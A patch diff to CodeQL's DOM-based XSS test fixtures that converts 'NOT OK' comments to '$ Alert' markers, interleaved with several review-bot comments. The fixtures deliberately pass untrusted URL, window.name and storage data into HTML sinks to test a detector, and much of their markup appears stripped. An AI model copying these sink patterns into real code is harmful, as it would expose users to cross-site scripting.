@@ -29,18 +29,18 @@ function badSanitizer() { return x; // No sanitization; } var tainted2 = target; - $('myId').html(tainted2); // NOT OK + $('myId').html(tainted2); // $ Alert if (sanitize) { tainted2 = sanitizeBad(tainted2); } - $('myId').html(tainted2); // NOT OK + $('myId').html(tainted2); // $ Alert var tainted3 = target; - $('myId').html(tainted3); // NOT OK + $('myId').html(tainted3); // $ Alert if (sanitize) { tainted3 = sanitizeBad(tainted3); } - $('myId').html(tainted3); // NOT OK + $('myId').html(tainted3); // $ Alert - $('myId').html(sanitize ? sanitizeBad(target) : target); // NOT OK + $('myId').html(sanitize ? sanitizeBad(target) : target); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx index 66b7d65f669b..b60ca27e0e47 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx @@ -7,13 +7,13 @@ export default function Post(params) { return ( <>
) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js index 318007dacfa0..2e403f76ddae 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js @@ -5,6 +5,6 @@ var app = express(); app.get('/some/path', function(req, res) { let tainted = req.param("code"); - ; // NOT OK - ; // NOT OK + ; // $ Alert + ; // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js index 6d7e20ec6eb8..3811c6b2c964 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js @@ -7,13 +7,13 @@ function useMyContext() { export function useDoc1() { let { root } = useMyContext(); - root.appendChild(window.name); // NOT OK + root.appendChild(window.name); // $ Alert } class C extends Component { foo() { let { root } = this.context; - root.appendChild(window.name); // NOT OK + root.appendChild(window.name); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js index 49d66634e5af..472f2026f1db 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js @@ -5,13 +5,13 @@ export function nextRouter() { return (
{ - router.push(router.query.foobar) // NOT OK + router.push(router.query.foobar) // $ Alert }}>Click to XSS 1 { - router.replace(router.query.foobar) // NOT OK + router.replace(router.query.foobar) // $ Alert }}>Click to XSS 2 { - router.push('/?foobar=' + router.query.foobar) // OK + router.push('/?foobar=' + router.query.foobar) }}>Safe Link
) @@ -20,7 +20,7 @@ export function nextRouter() { import { withRouter } from 'next/router' function Page({ router }) { - return router.push(router.query.foobar)}>Click to XSS 3 // NOT OK + return router.push(router.query.foobar)}>Click to XSS 3 // $ Alert } export const pageWithRouter = withRouter(Page); @@ -30,7 +30,7 @@ export function nextRouterWithLib() { return (
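Review bot: `router.push('/?foobar=' + router.query.foobar)` loses its `// OK` marker, and with it the only hint why this call is safe while the two `router.push(router.query.foobar)` / `router.replace(router.query.foobar)` calls above it are flagged: the hard-coded `/?` prefix pins the scheme and origin, so a `javascript:` URL or an external host cannot be injected through the query value. I would keep that reasoning on the line, `router.push('/?foobar=' + router.query.foobar) // OK - '/?' prefix fixes scheme and origin`, since it documents the exact boundary the sanitizer is expected to respect. The JSX around these calls is not fully visible in this rendering, so I have only checked the three `router` calls themselves.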
{ - router.push(router.query.foobar) // NOT OK + router.push(router.query.foobar) // $ Alert }}>Click to XSS 1
) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js index 672cd3bd6898..7bf77b18be10 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js @@ -2,25 +2,25 @@ import { useState } from 'react'; function initialState() { let [state, setState] = useState(window.name); - return
; // NOT OK + return
; // $ Alert } function setStateValue() { let [state, setState] = useState('foo'); setState(window.name); - return
; // NOT OK + return
; // $ Alert } function setStateValueLazy() { let [state, setState] = useState('foo'); setState(() => window.name); - return
; // NOT OK + return
; // $ Alert } function setStateValueLazy() { let [state, setState] = useState('foo'); setState(prev => { - document.body.innerHTML = prev; // NOT OK + document.body.innerHTML = prev; // $ Alert }) setState(() => window.name); } @@ -29,5 +29,5 @@ function setStateValueSafe() { let [state, setState] = useState('foo'); setState('safe'); setState(() => 'also safe'); - return
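Review bot: `function setStateValueLazy()` is declared twice in this hunk, once for the `setState(() => window.name)` case and again for the `setState(prev => { document.body.innerHTML = prev; ... })` updater case; the file is an ES module (`import { useState } from 'react'` in the hunk header), where duplicate top-level function declarations are an early SyntaxError, and in a script the second definition would silently replace the first. Since the two are separate fixtures, give the second its own name, `function setStateValueLazyUpdater() {`, so the test file stays valid JavaScript and each expectation is attached to a distinct function. The rest of the hunk only renames comments and looks fine.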
; // OK + return
; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js index 9d9fe6c80c97..3ece85044bb3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js @@ -15,35 +15,35 @@ function escapeAttr(s) { function test() { var tainted = window.name; var elt = document.createElement(); - elt.innerHTML = "" + escapeHtml(tainted) + ""; // OK - elt.innerHTML = "
" + escapeAttr(tainted) + "
"; // NOT OK, but not flagged - [INCONSISTENCY] + elt.innerHTML = "" + escapeHtml(tainted) + ""; + elt.innerHTML = "
" + escapeAttr(tainted) + "
"; // $ MISSING: Alert - not flagged - const regex = /[<>'"&]/; if (regex.test(tainted)) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (!regex.test(tainted)) { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } else { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } if (regex.exec(tainted)) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (regex.exec(tainted) != null) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (regex.exec(tainted) == null) { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } else { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } - elt.innerHTML = tainted.replace(/<\w+/g, ''); // NOT OK + elt.innerHTML = tainted.replace(/<\w+/g, ''); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js index 6c13ae8cc3e2..6ee44babf8bf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js 
@@ -2,29 +2,29 @@ sessionStorage.setItem('session', document.location.search); localStorage.setItem('local', document.location.search); - $('myId').html(sessionStorage.getItem('session')); // NOT OK - $('myId').html(localStorage.getItem('session')); // OK - $('myId').html(sessionStorage.getItem('local')); // OK - $('myId').html(localStorage.getItem('local')); // NOT OK + $('myId').html(sessionStorage.getItem('session')); // $ Alert + $('myId').html(localStorage.getItem('session')); + $('myId').html(sessionStorage.getItem('local')); + $('myId').html(localStorage.getItem('local')); // $ Alert var href = localStorage.getItem('local'); - $('myId').html("foobar"); // NOT OK + $('myId').html("foobar"); // $ Alert if (href.indexOf("\"") !== -1) { return; } - $('myId').html(""); // OK + $('myId').html(""); var href2 = localStorage.getItem('local'); if (href2.indexOf("\"") !== -1) { return; } - $('myId').html("\nfoobar"); // OK + $('myId').html("\nfoobar"); var href3 = localStorage.getItem('local'); if (href3.indexOf("\"") !== -1) { return; } - $('myId').html('\r\n' + "something" + ''); // OK + $('myId').html('\r\n' + "something" + ''); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js index 91e122dee0f5..d20f88dba398 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js 
@@ -1,12 +1,12 @@
-document.write(document.location.href.charCodeAt(0)); // OK
+document.write(document.location.href.charCodeAt(0));
 
-document.write(document.location); // NOT OK
-document.write(document.location.href); // NOT OK
-document.write(document.location.href.valueOf()); // NOT OK
-document.write(document.location.href.sup()); // NOT OK
-document.write(document.location.href.toUpperCase()); // NOT OK
-document.write(document.location.href.trimLeft()); // NOT OK
-document.write(String.fromCharCode(document.location.href)); // NOT OK
-document.write(String(document.location.href)); // NOT OK
-document.write(escape(document.location.href)); // OK (for now)
-document.write(escape(escape(escape(document.location.href)))); // OK (for now)
+document.write(document.location); // $ Alert
+document.write(document.location.href); // $ Alert
+document.write(document.location.href.valueOf()); // $ Alert
+document.write(document.location.href.sup()); // $ Alert
+document.write(document.location.href.toUpperCase()); // $ Alert
+document.write(document.location.href.trimLeft()); // $ Alert
+document.write(String.fromCharCode(document.location.href)); // $ Alert
+document.write(String(document.location.href)); // $ Alert
+document.write(escape(document.location.href)); // OK - for now
+document.write(escape(escape(escape(document.location.href)))); // OK - for now
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js
index a1feef0267a0..a823a6ce004f 100644
--- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js
+++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js
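Review bot: The two `escape(...)` lines keep an `OK - for now` verdict, which under the new expectation syntax is indistinguishable from a line that is intentionally safe; if the intent is that these should eventually be reported, mark them `// $ MISSING: Alert` (as jwt.js does in this same patch) so that a query improvement flips the test instead of passing silently. On the substance, `escape()` does percent-encode `<`, `>`, `"`, `'` and `&`, so its output cannot break out of an HTML text context, but it is a deprecated Annex B function and not an HTML encoder, and anything that URL-decodes the value downstream gets the raw payload back. Whichever reading the test encodes, say so on the line, e.g. `// OK - for now: escape() percent-encodes < > " ' &, not modelled as a sanitizer`.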
@@ -2,9 +2,9 @@ import 'dummy'; function foo(x, y, z) { arguments; // ensure 'arguments' are used - document.writeln(x); // OK - document.writeln(y); // NOT OK - document.writeln(z); // OK + document.writeln(x); + document.writeln(y); // $ Alert + document.writeln(z); } function bar() { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx index d030b30b1390..e1d26b45802d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx @@ -5,17 +5,17 @@ import ReactTooltip from 'react-tooltip'; function tooltips() { const source = window.name; return - // OK - // OK - // NOT OK - // NOT OK + + + // $ Alert + // $ Alert } function MyElement(props) { const provide = props.provide; - return
; // NOT OK + return
; // $ Alert } function useMyElement() { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js index 43ab0a02cf27..d57844a89f28 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js @@ -5,8 +5,7 @@ }; var target = document.location.search var searchParams = new URLSearchParams(target.substring(1)); - // NOT OK - $('original-term').html(searchParams.get('term')); - // OK + $('original-term').html(searchParams.get('term')); // $ Alert + $('translated-term').html(translate[searchParams.get('term')]); })(); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js index 7702768d6039..34eae2dc6a5b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js @@ -1,12 +1,12 @@ import * as lib from './trusted-types-lib'; -const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // NOT OK +const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // $ Alert policy1.createHTML(window.name); -const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' }); // OK +const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' }); policy2.createHTML(window.name); -const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); // OK +const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); policy3.createHTML('safe'); const policy4 = trustedTypes.createPolicy('x', { createHTML: lib.createHtml }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js index fea2063a4e3a..760edfa9ec8a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js @@ -1,144 +1,128 @@ function test() { var target = document.location.search - // NOT OK - $('myId').html(target) + $('myId').html(target) // $ Alert - // NOT OK - document.write(""); + document.write(""); // $ Alert document.write(""); - // NOT OK - $('
'); + $('
'); // $ Alert - $('
'); // OK - $('
'); // OK + $('
'); + $('
'); let params = (new URL(document.location)).searchParams; - $('name').html(params.get('name')); // NOT OK + $('name').html(params.get('name')); // $ Alert var searchParams = new URLSearchParams(target.substring(1)); - $('name').html(searchParams.get('name')); // NOT OK + $('name').html(searchParams.get('name')); // $ Alert } function foo(target) { - // NOT OK - $('myId').html(target); + $('myId').html(target); // $ Alert } foo(document.location.search); function bar() { return document.location.search; } -// NOT OK -$('myId').html(bar()); +$('myId').html(bar()); // $ Alert function baz(x) { return x; } -// NOT OK -$('myId').html(baz(document.location.search)); +$('myId').html(baz(document.location.search)); // $ Alert function wrap(s) { return "
" + s + "
"; } -// NOT OK -$('myId').html(wrap(document.location.search)); +$('myId').html(wrap(document.location.search)); // $ Alert function chop(s) { if (s) return s.substr(1); return ""; } -// NOT OK -$('myId').html(chop(document.location.search)); -// NOT OK (duplicated to test precision of flow tracking) -$('myId').html(chop(document.location.search)); -// NOT OK -$('myId').html(wrap(chop(bar()))); +$('myId').html(chop(document.location.search)); // $ Alert +$('myId').html(chop(document.location.search)); // $ Alert - duplicated to test precision of flow tracking +$('myId').html(wrap(chop(bar()))); // $ Alert function dangerouslySetInnerHtml(s) { - // NOT OK - $('myId').html(s); + $('myId').html(s); // $ Alert } dangerouslySetInnerHtml(document.location.search); dangerouslySetInnerHtml(document.location.search); -// NOT OK -$('myId').html(bar()); +$('myId').html(bar()); // $ Alert [,document.location.search].forEach(function(x) { if (x) - // NOT OK - $('myId').html(x); + $('myId').html(x); // $ Alert }); -// NOT OK -let s = ; +let s = ; // $ Alert angular.module('myApp', []) .service("myService", function($sce, $other) { - $sce.trustAsHtml(document.location.search); // NOT OK - $sce.trustAsCss(document.location.search); // NOT OK - $sce.trustAsUNKNOWN(document.location.search); // OK - $sce.trustAs($sce.HTML, document.location.search); // NOT OK - $sce.trustAs($sce.CSS, document.location.search); // NOT OK - $sce.trustAs(UNKNOWN, document.location.search); // OK - $other.trustAsHtml(document.location.search); // OK + $sce.trustAsHtml(document.location.search); // $ Alert + $sce.trustAsCss(document.location.search); // $ Alert + $sce.trustAsUNKNOWN(document.location.search); + $sce.trustAs($sce.HTML, document.location.search); // $ Alert + $sce.trustAs($sce.CSS, document.location.search); // $ Alert + $sce.trustAs(UNKNOWN, document.location.search); + $other.trustAsHtml(document.location.search); }) .service("myService2", function() { - angular.element('
').html(document.location.search); // NOT OK - angular.element('
').html('SAFE'); // OK + angular.element('
').html(document.location.search); // $ Alert + angular.element('
').html('SAFE'); }) .directive('myCustomer', function() { return { link: function(scope, element){ - element.html(document.location.search); // NOT OK - element.html('SAFE'); // OK + element.html(document.location.search); // $ Alert + element.html('SAFE'); } }; }) .service("myService3", function() { - angular.element(document.location.search); // NOT OK - angular.element('SAFE'); // OK + angular.element(document.location.search); // $ Alert + angular.element('SAFE'); }) function tst() { var v = document.location.search.substr(1); - // NOT OK - document.write(v); + document.write(v); // $ Alert if (/^\d+$/.test(v)) { - // OK + document.write(v); } if ((m = /^\d+$/.exec(v))) { - // OK + document.write(v); } if (v.match(/^\d+$/)) { - // OK + document.write(v); } if (v.match("^\\d+$")) { - // OK + document.write(v); } if (!(/\d+/.test(v))) // not effective - matches "123" return; - // NOT OK - document.write(v); + document.write(v); // $ Alert if (!(/^\d+$/.test(v))) return; - // OK + document.write(v); } @@ -148,11 +132,11 @@ function angularJSServices() { xssSinkService1(window.location.search); }]) .factory("xssSinkService1", function(){ - return function(v){ $("
").html(v); } // NOT OK + return function(v){ $("
").html(v); } // $ Alert }) .factory("xssSource_from_service", ["xssSourceService", function(xssSourceService){ - $("
").html(xssSourceService()); // NOT OK + $("
").html(xssSourceService()); // $ Alert }]) .factory("xssSourceService", function(){ return function() { return window.location.search }; @@ -162,11 +146,11 @@ function angularJSServices() { xssSinkService2("innocent"); }]) .factory("xssSinkService2", function(){ - return function(v){ $("
").html(v); } // OK + return function(v){ $("
").html(v); } }) .factory("innocentSource_from_service", ["innocentSourceService", function(innocentSourceService){ - $("
").html(innocentSourceService()); // OK + $("
").html(innocentSourceService()); }]) .factory("innocentSourceService", function(){ return function() { return "innocent" }; @@ -177,27 +161,27 @@ function testDOMParser() { var target = document.location.search var parser = new DOMParser(); - parser.parseFromString(target, "application/xml"); // NOT OK + parser.parseFromString(target, "application/xml"); // $ Alert } function references() { var tainted = document.location.search; - document.body.innerHTML = tainted; // NOT OK + document.body.innerHTML = tainted; // $ Alert - document.createElement().innerHTML = tainted; // NOT OK - createElement().innerHTML = tainted; // NOT OK + document.createElement().innerHTML = tainted; // $ Alert + createElement().innerHTML = tainted; // $ Alert - document.getElementsByClassName()[0].innerHTML = tainted; // NOT OK - getElementsByClassName()[0].innerHTML = tainted; // NOT OK - getElementsByClassName().item().innerHTML = tainted; // NOT OK + document.getElementsByClassName()[0].innerHTML = tainted; // $ Alert + getElementsByClassName()[0].innerHTML = tainted; // $ Alert + getElementsByClassName().item().innerHTML = tainted; // $ Alert } function react(){ var tainted = document.location.search; - React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // NOT OK - React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // NOT OK + React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert + React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert class C1 extends React.Component { constructor() { 
@@ -209,26 +193,26 @@ function react(){ } test() { - $('myId').html(this.state.tainted1); // NOT OK - $('myId').html(this.state.tainted2); // NOT OK - $('myId').html(this.state.tainted3); // NOT OK - $('myId').html(this.state.notTainted); // OK + $('myId').html(this.state.tainted1); // $ Alert + $('myId').html(this.state.tainted2); // $ Alert + $('myId').html(this.state.tainted3); // $ Alert + $('myId').html(this.state.notTainted); this.setState(prevState => { - $('myId').html(prevState.tainted4) // NOT OK + $('myId').html(prevState.tainted4) // $ Alert }); } } class C2 extends React.Component { test() { - $('myId').html(this.props.tainted1); // NOT OK - $('myId').html(this.props.tainted2); // NOT OK - $('myId').html(this.props.tainted3); // NOT OK - $('myId').html(this.props.notTainted); // OK + $('myId').html(this.props.tainted1); // $ Alert + $('myId').html(this.props.tainted2); // $ Alert + $('myId').html(this.props.tainted3); // $ Alert + $('myId').html(this.props.notTainted); this.setState((prevState, prevProps) => { - $('myId').html(prevProps.tainted4) // NOT OK + $('myId').html(prevProps.tainted4) // $ Alert }); } } @@ -256,28 +240,28 @@ function react(){ } function windowName() { - $(window.name); // NOT OK - $(name); // NOT OK + $(window.name); // $ Alert + $(name); // $ Alert } function windowNameAssigned() { for (name of ['a', 'b']) { - $(window.name); // NOT OK - $(name); // OK + $(window.name); // $ Alert + $(name); } } function jqueryLocation() { - $(location); // OK - $(window.location); // OK - $(document.location); // OK + $(location); + $(window.location); + $(document.location); var loc1 = location; var loc2 = window.location; var loc3 = document.location; - $(loc1); // OK - $(loc2); // OK - $(loc3); // OK + $(loc1); + $(loc2); + $(loc3); - $("body").append(location); // NOT OK + $("body").append(location); // $ Alert } 
@@ -285,7 +269,7 @@ function testCreateContextualFragment() { var tainted = window.name; var range = document.createRange(); range.selectNode(document.getElementsByTagName("div").item(0)); - var documentFragment = range.createContextualFragment(tainted); // NOT OK + var documentFragment = range.createContextualFragment(tainted); // $ Alert document.body.appendChild(documentFragment); } @@ -293,14 +277,14 @@ function flowThroughPropertyNames() { var obj = {}; obj[Math.random()] = window.name; for (var p in obj) - $(p); // OK + $(p); } function basicExceptions() { try { throw location; } catch(e) { - $("body").append(e); // NOT OK + $("body").append(e); // $ Alert } try { @@ -308,18 +292,18 @@ function basicExceptions() { throw location } finally {} } catch(e) { - $("body").append(e); // NOT OK + $("body").append(e); // $ Alert } } function handlebarsSafeString() { - return new Handlebars.SafeString(location); // NOT OK! + return new Handlebars.SafeString(location); // $ Alert } function test2() { var target = document.location.search - // OK + $('myId').html(target.length) } @@ -329,10 +313,10 @@ function getTaintedUrl() { function URLPseudoProperties() { let params = getTaintedUrl().searchParams; - $('name').html(params.get('name')); // NOT OK + $('name').html(params.get('name')); // $ Alert let myUrl = getTaintedUrl(); - $('name').html(myUrl.get('name')); // OK (.get is not defined on a URL) + $('name').html(myUrl.get('name')); // OK - .get is not defined on a URL } 
@@ -340,27 +324,27 @@ function hash() { function getUrl() { return new URL(document.location); } - $(getUrl().hash.substring(1)); // NOT OK + $(getUrl().hash.substring(1)); // $ Alert } function growl() { var target = document.location.search - $.jGrowl(target); // NOT OK + $.jGrowl(target); // $ Alert } function thisNodes() { var pluginName = "myFancyJQueryPlugin"; var myPlugin = function () { var target = document.location.search - this.html(target); // NOT OK. (this is a jQuery object) - this.innerHTML = target // OK. (this is a jQuery object) + this.html(target); // $ Alert - this is a jQuery object + this.innerHTML = target // OK - this is a jQuery object this.each(function (i, e) { - this.innerHTML = target; // NOT OK. (this is a DOM-node); - this.html(target); // OK. (this is a DOM-node); + this.innerHTML = target; // $ Alert - (this is a DOM-node); + this.html(target); // OK - (this is a DOM-node); - e.innerHTML = target; // NOT OK. + e.innerHTML = target; // $ Alert }); } $.fn[pluginName] = myPlugin; @@ -370,8 +354,7 @@ function thisNodes() { function test() { var target = document.location.search - // NOT OK - $('myId').html(target) + $('myId').html(target) // $ Alert // OK - but only safe because contents are URI-encoded $('myid').html(document.location.href.split("?")[0]); 
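Review bot: Two of the rewritten comments in thisNodes keep the old parenthesised wording and trailing semicolon, `// $ Alert - (this is a DOM-node);` and `// OK - (this is a DOM-node);`, while the two lines directly above them use the plain form `// $ Alert - this is a jQuery object`. Dropping the parentheses and the stray `;` — `this.innerHTML = target; // $ Alert - this is a DOM-node` and `this.html(target); // OK - this is a DOM-node` — makes the four lines read as one set. The same leftover parentheses appear in the `res.send(err); // OK - (the above ...)` line of the exception-xss.js hunk at -189,7.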
@@ -381,68 +364,68 @@ function test() { var target = document.location.search - $('myId').html(target); // NOT OK + $('myId').html(target); // $ Alert - $('myId').html(target.taint); // NOT OK + $('myId').html(target.taint); // $ Alert target.taint2 = 2; - $('myId').html(target.taint2); // OK + $('myId').html(target.taint2); target.taint3 = document.location.search; - $('myId').html(target.taint3); // NOT OK + $('myId').html(target.taint3); // $ Alert target.sub.taint4 = 2 - $('myId').html(target.sub.taint4); // OK + $('myId').html(target.sub.taint4); - $('myId').html(target.taint5); // NOT OK + $('myId').html(target.taint5); // $ Alert target.taint5 = "safe"; target.taint6 = 2; if (random()) {return;} - $('myId').html(target.taint6); // OK + $('myId').html(target.taint6); if (random()) {target.taint7 = "safe";} - $('myId').html(target.taint7); // NOT OK + $('myId').html(target.taint7); // $ Alert target.taint8 = target.taint8; - $('myId').html(target.taint8); // NOT OK + $('myId').html(target.taint8); // $ Alert target.taint9 = (target.taint9 = "safe"); - $('myId').html(target.taint9); // OK + $('myId').html(target.taint9); } function hash2() { var payload = window.location.hash.substr(1); - document.write(payload); // NOT OK + document.write(payload); // $ Alert let match = window.location.hash.match(/hello (\w+)/); if (match) { - document.write(match[1]); // NOT OK + document.write(match[1]); // $ Alert } - document.write(window.location.hash.split('#')[1]); // NOT OK + document.write(window.location.hash.split('#')[1]); // $ Alert } function nonGlobalSanitizer() { var target = document.location.search - $("#foo").html(target.replace(/[\s\S]*<\/metadata>/, '')); // NOT OK + $("#foo").html(target.replace(/[\s\S]*<\/metadata>/, '')); // $ Alert - $("#foo").html(target.replace(/<|>/g, '')); // OK + $("#foo").html(target.replace(/<|>/g, '')); } function mootools(){ var source = document.location.search; - new Element("div"); // OK - new Element("div", {text: 
source}); // OK - new Element("div", {html: source}); // NOT OK - new Element("div").set("html", source); // NOT OK - new Element("div").set({"html": source}); // NOT OK - new Element("div").setProperty("html", source); // NOT OK - new Element("div").setProperties({"html": source}); // NOT OK - new Element("div").appendHtml(source); // NOT OK + new Element("div"); + new Element("div", {text: source}); + new Element("div", {html: source}); // $ Alert + new Element("div").set("html", source); // $ Alert + new Element("div").set({"html": source}); // $ Alert + new Element("div").setProperty("html", source); // $ Alert + new Element("div").setProperties({"html": source}); // $ Alert + new Element("div").appendHtml(source); // $ Alert } 
@@ -452,53 +435,53 @@ const ansiToHtml = new Convert(); function ansiToHTML() { var source = document.location.search; - $("#foo").html(source); // NOT OK - $("#foo").html(ansiToHtml.toHtml(source)); // NOT OK + $("#foo").html(source); // $ Alert + $("#foo").html(ansiToHtml.toHtml(source)); // $ Alert } function domMethods() { var source = document.location.search; let table = document.getElementById('mytable'); - table.innerHTML = source; // NOT OK + table.innerHTML = source; // $ Alert let row = table.insertRow(-1); - row.innerHTML = source; // NOT OK + row.innerHTML = source; // $ Alert let cell = row.insertCell(); - cell.innerHTML = source; // NOT OK + cell.innerHTML = source; // $ Alert } function urlStuff() { var url = document.location.search.substr(1); - $("", {href: url}).appendTo("body"); // NOT OK - $("#foo").attr("href", url); // NOT OK - $("#foo").attr({href: url}); // NOT OK - $("", {src: url}).appendTo("body"); // NOT OK - $("", {href: win.location.href}).appendTo("body"); // OK + $("", {href: url}).appendTo("body"); // $ Alert + $("#foo").attr("href", url); // $ Alert + $("#foo").attr({href: url}); // $ Alert + $("", {src: url}).appendTo("body"); // $ Alert + $("", {href: win.location.href}).appendTo("body"); - $("", {src: "http://google.com/" + url}).appendTo("body"); // OK + $("", {src: "http://google.com/" + url}).appendTo("body"); - $("", {src: ["http://google.com", url].join("/")}).appendTo("body"); // OK + $("", {src: ["http://google.com", url].join("/")}).appendTo("body"); if (url.startsWith("https://")) { - $("", {src: url}).appendTo("body"); // OK + $("", {src: url}).appendTo("body"); } else { - $("", {src: url}).appendTo("body"); // NOT OK + $("", {src: url}).appendTo("body"); // $ Alert } window.open(location.hash.substr(1)); // OK - any JavaScript is executed in another context - navigation.navigate(location.hash.substr(1)); // NOT OK + navigation.navigate(location.hash.substr(1)); // $ Alert const myHistory = 
require('history').createBrowserHistory(); - myHistory.push(location.hash.substr(1)); // NOT OK + myHistory.push(location.hash.substr(1)); // $ Alert } function Foo() { this.foo = document; var obj = { bar: function() { - this.foo.body.innerHTML = decodeURI(window.location.hash); // NOT OK + this.foo.body.innerHTML = decodeURI(window.location.hash); // $ Alert } }; Object.assign(this, obj); @@ -506,7 +489,7 @@ function Foo() { function nonGlobalSanitizer() { var target = document.location.search - $("#foo").html(target.replace(new RegExp("<|>"), '')); // NOT OK - $("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK -- most likely good. We don't know what the flags are. - $("#foo").html(target.replace(new RegExp("<|>", "g"), '')); // OK + $("#foo").html(target.replace(new RegExp("<|>"), '')); // $ Alert + $("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK - most likely good. We don't know what the flags are. + $("#foo").html(target.replace(new RegExp("<|>", "g"), '')); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js index a6d26e408872..16932da72c05 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js 
